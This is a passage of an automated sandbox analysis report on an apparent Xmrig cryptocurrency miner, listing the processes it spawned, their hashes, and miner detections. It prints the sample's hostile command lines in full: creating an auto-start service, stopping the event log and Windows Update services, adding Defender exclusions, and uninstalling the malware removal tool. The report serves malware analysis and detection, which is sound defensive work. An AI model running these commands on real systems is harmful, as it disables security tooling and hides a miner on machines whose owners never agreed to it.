                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:17
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:18
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                      Imagebase:0x7ff728960000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:19
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                      Imagebase:0x7ff728960000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:20
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:21
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                      Imagebase:0x7ff728960000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:22
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:23
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                      Imagebase:0x7ff728960000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:24
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:25
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\dialer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\dialer.exe
                                                      Imagebase:0x7ff6ae8e0000
                                                      File size:39'936 bytes
                                                      MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:26
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:27
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe delete "CKTJZLMO"
                                                      Imagebase:0x7ff61f410000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:28
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:29
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto"
                                                      Imagebase:0x7ff61f410000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:30
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:31
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\winlogon.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:winlogon.exe
                                                      Imagebase:0x7ff7f7550000
                                                      File size:906'240 bytes
                                                      MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:32
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                      Imagebase:0x7ff61f410000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:33
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe start "CKTJZLMO"
                                                      Imagebase:0x7ff61f410000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:34
                                                      Start time:10:10:18
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:35
                                                      Start time:10:10:18
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:36
                                                      Start time:10:10:18
                                                      Start date:07/01/2025
                                                      Path:C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
                                                      Imagebase:0x7ff752d50000
                                                      File size:5'471'744 bytes
                                                      MD5 hash:7D6398EBFB82A24748617189BF4AD691
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 74%, ReversingLabs
                                                      Has exited:true

                                                      General

                                                      Target ID:37
                                                      Start time:10:10:18
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\lsass.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\lsass.exe
                                                      Imagebase:0x7ff7bf4f0000
                                                      File size:59'456 bytes
                                                      MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:38
                                                      Start time:10:10:18
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                      Imagebase:0x7ff760310000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:39
                                                      Start time:10:10:18
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:40
                                                      Start time:10:10:18
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                      Imagebase:0x7ff77afe0000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:42
                                                      Start time:10:10:19
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\dwm.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"dwm.exe"
                                                      Imagebase:0x7ff6f73e0000
                                                      File size:94'720 bytes
                                                      MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:43
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff7f4b70000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:44
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                      Imagebase:0x7ff61f410000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:45
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:46
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:47
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\wusa.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff621dd0000
                                                      File size:345'088 bytes
                                                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:48
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                      Imagebase:0x7ff61f410000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:49
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:50
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                      Imagebase:0x7ff61f410000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:51
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:52
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop bits
                                                      Imagebase:0x7ff61f410000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:53
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:54
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                      Imagebase:0x7ff61f410000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:55
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:56
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                      Imagebase:0x7ff728960000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:57
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                      Imagebase:0x7ff728960000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:58
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:59
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                      Imagebase:0x7ff728960000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:60
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:61
                                                      Start time:10:10:21
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                      Imagebase:0x7ff728960000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:62
                                                      Start time:10:10:21
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:63
                                                      Start time:10:10:21
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\dialer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\dialer.exe
                                                      Imagebase:0x7ff6ae8e0000
                                                      File size:39'936 bytes
                                                      MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:64
                                                      Start time:10:10:21
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:65
                                                      Start time:10:10:21
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\dialer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\dialer.exe
                                                      Imagebase:0x7ff6ae8e0000
                                                      File size:39'936 bytes
                                                      MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:66
                                                      Start time:10:10:21
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\dialer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:dialer.exe
                                                      Imagebase:0x7ff6ae8e0000
                                                      File size:39'936 bytes
                                                      MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000042.00000002.2793385319.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000042.00000002.2793385319.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                      Has exited:false

                                                      General

                                                      Target ID:67
                                                      Start time:10:10:21
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                      Imagebase:0x7ff77afe0000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:68
                                                      Start time:10:10:21
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                      Imagebase:0x7ff77afe0000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:69
                                                      Start time:10:10:21
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                      Imagebase:0x7ff77afe0000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Disassembly

                                                      Reset < >

                                                        Executed Functions

                                                        Function 00007FF641DC1140 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1534557737.00007FF641DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF641DC0000, based on PE: true
                                                        • Associated: 00000000.00000002.1534528500.00007FF641DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1534604518.00007FF641DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1534629396.00007FF641DCF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1534693688.00007FF641DD0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1535247939.00007FF6422C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1535305719.00007FF6422FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff641dc0000_xmr new.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                        • Instruction ID: 396df7b951f83921384d6718dedb4ef1ad96527ad72314e3859fdf7388d85454
                                                        • Opcode Fuzzy Hash: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                        • Instruction Fuzzy Hash: 98B012F0D0C319C8E3033F41D8413583260AB4D741F400A30C60C43352DF7D90414B10

                                                        Execution Graph

                                                        Execution Coverage:46.1%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:67%
                                                        Total number of Nodes:227
                                                        Total number of Limit Nodes:24
